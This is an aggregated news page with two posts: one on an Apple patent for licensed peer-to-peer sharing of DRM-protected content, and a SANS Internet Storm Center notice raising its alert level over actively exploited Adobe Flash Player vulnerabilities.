“This reduction in operating expenses may facilitate a two-tier pricing structure. For example, the digital content store may charge a first price to users who download a digital content unit from the store and a second price to users who authorize a digital content unit without downloading the unit,” the patent reads.

This price reduction may then make it more interesting to share files legally, thereby reducing traditional forms of piracy.

“This may encourage users to trade or copy digital content units as well as authorize these copies. Such sharing may, in turn, reduce piracy or illegal copying..,” Apple argues.

apple2

While “legalized P2P sharing” may sound appealing, in theory it’s actually quite restrictive. The idea introduces a new layer of content protection which means that the files in question can only be played on “trusted client software.”

This means that transferring files between devices is only possible if these support Apple’s licensing scheme. That’s actually a step backwards from the DRM-free music that’s sold in most stores today.

It’s unclear whether Apple has any plans to use the P2P licensing technology in the wild. The original idea is a bit dated, but perhaps Apple can think of some less restrictive implementations of their newly obtained patent.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: yellow: Infocon change to yellow for Adobe Flash issues, (Fri, Jan 23rd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

We have decided to change the Infocon 1to yellow in order to bring attention to the multiple recentAdobe Flash Player vulnerabilities2 that are being actively exploited. There have been 3 patchedvulnerabilities thathave an update and applying themis highly recommended. 1 of the vulnerabilities has not yet been patched, and is expected to be released as an OOB (Outof Band) next week by Adobe 3.

Our reasoning is that the Adobe Flash Player is very widely installed, the vulnerability affects multiple platforms, remote code execution gives the attacker complete control of the system, the patch is not yet available, it affects both organizational IT systems as well as home or soho users, a crimeware kit is actively exploiting the vulnerabilities, people might mistakenly believe that the patch from yesterday fixes all of the issues, and last but not least mitigation through the use of EMET or other tools/means is not normally feasible for home users or quick deployment in enterprise environments without testing. In short, the high impact of these vulnerabilities being exploited warrants raising the Infoconfrom now until Monday.

1-https://isc.sans.edu/infocon.html

2-https://isc.sans.edu/forums/diary/Flash+0Day+Deciphering+CVEs+and+Understanding+Patches/19223/

3-“>Adrien de Beaupr”>My SANS teaching schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.